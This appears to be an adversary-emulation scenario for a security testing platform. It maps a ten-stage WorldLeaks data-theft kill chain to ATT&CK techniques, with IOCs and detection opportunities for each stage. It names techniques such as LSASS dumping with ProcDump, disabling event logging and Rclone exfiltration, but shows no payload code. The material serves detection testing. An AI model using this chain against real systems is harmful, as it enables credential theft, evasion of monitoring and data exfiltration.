WordLeaks Document Exfiltration Campaign
Overview
wordleaks-document-exfiltration-campaign
π― WorldLeaks β Pure Extortion Campaign
Category: Data Exfiltration | Severity: π΄ Critical | Focus: Incident Response
π Executive Summary
This scenario simulates a full-chain WorldLeaks (ex-Hunters International) pure extortion attack, based on the SOSRansomware threat intelligence report and corroborated by Group-IB and Lexfo Security research.
WorldLeaks represents the evolution of Hunters International, which itself emerged from Hive ransomware's infrastructure. In January 2025, the group pivoted from traditional double extortion (encrypt + leak) to pure extortion only β stealing data without encrypting systems. This scenario reproduces their exact TTP chain, from initial access via spearphishing to data exfiltration using Rclone, with emphasis on the collection and exfiltration phases that define their operational model.
π§ Threat Actor Profile
| Attribute | Details | |---|---| | Name | WorldLeaks (formerly Hunters International, Hive lineage) | | Active Since | January 2025 (rebrand from Hunters International) | | Model | Pure extortion β data theft without encryption | | Infrastructure | 4-tier architecture: Storage Software β Automation Server β Proxy Layer β Victim Network | | Notable Victims | Dell (1.3TB / 416,103 files), L3Harris, Tata Technologies | | Recruitment | Actively recruits affiliates on underground forums |
IOCs Referenced
| IOC | Type | Context |
|---|---|---|
| 6a9c0f3f2c7d9e9fd2e33e71b91d5e5f6cbd27ef | SHA-1 | Custom exfiltration tool binary |
| e4c1a3e345a2f5d872ea04cd1fd3a7725b927ffa | SHA-1 | Vulnerable kernel driver (BYOVD) |
| 185.217.69.101 | IPv4 | C2 infrastructure (not used in payloads β safe-by-design) |
| HKCU\Software\Microsoft\Windows\CurrentVersion\Run\wldboot | Registry Key | Persistence mechanism |
π Kill Chain β 10 Injects
Stage 1 β Initial Access: Spearphishing Macro Execution
| | | |---|---| | ATT&CK | T1566.001 β Phishing: Spearphishing Attachment | | Delay | T+0s (scenario start) | | Description | Simulates the delivery of a weaponized Office document containing a VBA macro. WorldLeaks affiliates commonly use spearphishing emails with macro-enabled attachments (.xlsm, .docm) as the initial compromise vector. The macro establishes initial code execution on the victim endpoint. | | What it does | Drops and executes a simulated macro payload, generating process creation artifacts consistent with Office child process spawning (winword.exe β cmd.exe/powershell.exe). | | Detection opportunities | Office application spawning child processes, VBA macro execution events, suspicious file writes from Office processes. |
Stage 2 β Execution: Encoded PowerShell Stager
| | |
|---|---|
| ATT&CK | T1059.001 β Command and Scripting Interpreter: PowerShell |
| Delay | T+2min |
| Description | Following initial macro execution, WorldLeaks deploys an encoded PowerShell stager to establish a foothold. Base64-encoded commands are used to evade basic command-line logging and static detection rules. |
| What it does | Executes a Base64-encoded PowerShell command that performs reconnaissance and establishes persistence artifacts. This mirrors the real-world technique where WorldLeaks uses -EncodedCommand to bypass AMSI and script block logging. |
| Detection opportunities | PowerShell with -EncodedCommand flag, suspicious Base64 strings in command line, ScriptBlock logging events (Event ID 4104). |
Stage 3 β Discovery: System & Network Reconnaissance
| | |
|---|---|
| ATT&CK | T1082 β System Information Discovery / T1135 β Network Share Discovery |
| Delay | T+4min |
| Description | WorldLeaks operators perform extensive reconnaissance to identify high-value data stores before exfiltration. This includes system profiling, network share enumeration, and identification of accessible file servers β critical for their pure extortion model where data selection directly impacts ransom leverage. |
| What it does | Executes native Windows commands (systeminfo, net share, net view, ipconfig /all) to enumerate the local system and network topology. Results are collected for operator review. |
| Detection opportunities | Rapid succession of discovery commands, net.exe/net1.exe execution, unusual enumeration patterns from a single endpoint. |
Stage 4 β Discovery: Security Software Discovery
| | |
|---|---|
| ATT&CK | T1057 β Process Discovery |
| Delay | T+6min |
| Description | Before escalating privileges and moving laterally, WorldLeaks operators enumerate running security products to tailor their evasion techniques. Identifying EDR agents, antivirus solutions, and monitoring tools allows them to select the appropriate defense evasion strategy for the target environment. |
| What it does | Enumerates running processes and installed services to identify security software (EDR agents, AV products, SIEM collectors). Uses native Windows commands and WMI queries. |
| Detection opportunities | WMI queries targeting AntiVirusProduct class, process enumeration focused on security tools, tasklist / Get-Process with filtering patterns. |
Stage 5 β Credential Access: LSASS Credential Dump (ProcDump)
| | |
|---|---|
| ATT&CK | T1003.001 β OS Credential Dumping: LSASS Memory |
| Delay | T+8min |
| Description | WorldLeaks operators dump LSASS process memory to extract plaintext credentials, NTLM hashes, and Kerberos tickets. ProcDump (a legitimate Sysinternals tool) is used to create the memory dump, reducing detection surface compared to tools like Mimikatz. This technique was specifically observed in Hunters International / WorldLeaks campaigns. |
| What it does | Downloads ProcDump (with prerequisite check), creates a memory dump of the LSASS process. The dump file is written to a controlled artifact directory and cleaned up after execution. |
| Detection opportunities | Access to LSASS process memory (Sysmon Event ID 10), ProcDump execution with -ma flag targeting lsass.exe, suspicious .dmp file creation, credential guard alerts. |
Stage 6 β Defense Evasion: Disable Windows Event Logging
| | |
|---|---|
| ATT&CK | T1562.002 β Impair Defenses: Disable Windows Event Logging |
| Delay | T+10min |
| Description | Before proceeding to lateral movement and data collection, WorldLeaks operators disable or tamper with Windows event logging to blind SIEM and forensic analysis. This is a critical step in their operational playbook β reducing the evidence trail makes post-incident investigation significantly harder, increasing pressure on victims to pay the ransom rather than attempt recovery. |
| What it does | Disables Windows event logging services with state backup for cleanup restoration. All original settings are saved and restored during cleanup. |
| Detection opportunities | Event log service stop events (Event ID 1100/1102), wevtutil commands, security audit policy changes, gaps in event log continuity. |
Stage 7 β Persistence: Scheduled Task
| | |
|---|---|
| ATT&CK | T1053.005 β Scheduled Task/Job: Scheduled Task |
| Delay | T+12min |
| Description | WorldLeaks establishes persistence via scheduled tasks to maintain access across reboots. The IOC HKCU\Software\Microsoft\Windows\CurrentVersion\Run\wldboot from threat intelligence indicates they also use Run Keys, but scheduled tasks provide more flexible execution options and can be configured with specific triggers (logon, idle, time-based). This ensures the operator can return to the compromised environment if the initial access channel is lost. |
| What it does | Creates a scheduled task that simulates WorldLeaks persistence. The task is fully removed during cleanup β no durable attacker capability is left behind. |
| Detection opportunities | schtasks.exe /create, Event ID 4698 (Scheduled task created), new task entries in C:\Windows\System32\Tasks\, suspicious task actions pointing to PowerShell or cmd.exe. |
π― Stage 8 β Collection: Sensitive Data Harvesting
| | | |---|---| | ATT&CK | T1039 β Data from Network Shared Drive / T1074.001 β Data Staged: Local Data Staging | | Delay | T+14min | | Description | Core WorldLeaks TTP. Operators systematically harvest sensitive data from network shares and local repositories. In the Dell breach, WorldLeaks exfiltrated 1.3TB across 416,103 files. Their custom "Storage Software" component automates file discovery and collection based on file type, size, and path patterns β prioritizing financial documents, intellectual property, HR records, and customer data for maximum extortion leverage. | | What it does | Discovers and catalogs files matching sensitive patterns across accessible storage locations. Uses parameterized OpenAEV arguments for target paths β no hardcoded hostnames or shares. | | Detection opportunities | Unusual file access patterns (bulk reads), enumeration of multiple network shares in rapid succession, file metadata collection activity, staging directory creation. |
π― Stage 9 β Archive: Data Staging & Compression
| | |
|---|---|
| ATT&CK | T1560.001 β Archive Collected Data: Archive via Utility |
| Delay | T+16min |
| Description | Core WorldLeaks TTP. Before exfiltration, collected data is compressed into password-protected archives. This serves dual purposes: reducing transfer volume and evading DLP/content inspection systems that cannot examine encrypted archives. In the Dell breach, WorldLeaks compressed 1.3TB of data before exfiltration through their proxy infrastructure. |
| What it does | Compresses target files into a password-protected archive. The payload uses OpenAEV arguments for target paths and passwords β nothing is hardcoded. Full cleanup removes the archiving tool and all archive artifacts. |
| Detection opportunities | Archive utility execution with password flag (-p), large archive creation, unusual compression activity from non-standard paths, file access patterns indicating bulk data collection. |
π― Stage 10 β Exfiltration: Rclone Cloud Upload
| | |
|---|---|
| ATT&CK | T1567 β Exfiltration Over Web Service |
| Delay | T+18min |
| Description | Signature WorldLeaks technique. The group uses Rclone β a legitimate cloud synchronization tool β to exfiltrate archived data to attacker-controlled cloud storage. Rclone supports 40+ cloud providers, making it extremely versatile for data theft. WorldLeaks' 4-tier infrastructure routes exfiltrated data through proxy layers to their Storage Software servers. This is the culmination of the pure extortion model: steal, don't encrypt. |
| What it does | Downloads Rclone (with prerequisite check), creates a configuration pointing to a non-existent endpoint (safe-by-design β no actual data leaves the network), and executes the upload command. The payload generates all the process creation, network connection, and configuration artifacts that a real Rclone exfiltration would produce. Full cleanup removes Rclone, config files, and all artifacts. |
| Detection opportunities | rclone.exe process execution, Rclone configuration file creation (rclone.conf), outbound HTTPS connections to cloud storage APIs, large outbound data transfers, DNS queries to cloud provider domains, command-line arguments containing copy or sync with remote paths. |
π Security Checklist
| Criterion | Status | |---|---| | No C2 / reverse shell / beacon | β All traffic stays local or targets non-existent endpoints | | No real malware / ransomware binaries | β Only native Windows tools + legitimate utilities | | No actual data exfiltration | β Rclone targets a non-routable/non-existent endpoint | | Cleanup removes all artifacts | β Dumps, archives, logs, tools all cleaned | | Cleanup removes persistence | β Scheduled tasks deleted | | Cleanup restores security settings | β Event logging state restored from backup | | ATT&CK mapping on every inject | β 10 techniques mapped across 7 tactics | | No hardcoded hostnames/IPs | β OpenAEV arguments used for parameterization | | Uses existing verified payloads | β No custom "bullshit" payloads β all from verified library |
π Value Proposition
- Source-driven realism β Every stage maps directly to WorldLeaks TTPs documented in the SOSRansomware report, Group-IB research, and Lexfo Security analysis
- Exfiltration emphasis β Stages 8-10 specifically reproduce WorldLeaks' pure extortion model (collect β archive β exfiltrate), differentiating them from traditional ransomware groups
- Detection validation β Each inject generates real artifacts (process creation, file system, registry, network) that validate EDR/SIEM detection rules
- Safe-by-design β Full execution on production-like environments without risk: no real C2, no real exfiltration, complete cleanup
- Parameterized payloads β OpenAEV arguments allow customization per environment without modifying payload code
- Complete kill chain coverage β 10 ATT&CK techniques across 7 tactics, providing comprehensive detection gap analysis
Total execution time: ~18 minutes | 10 injects | 10 ATT&CK techniques | 7 tactics covered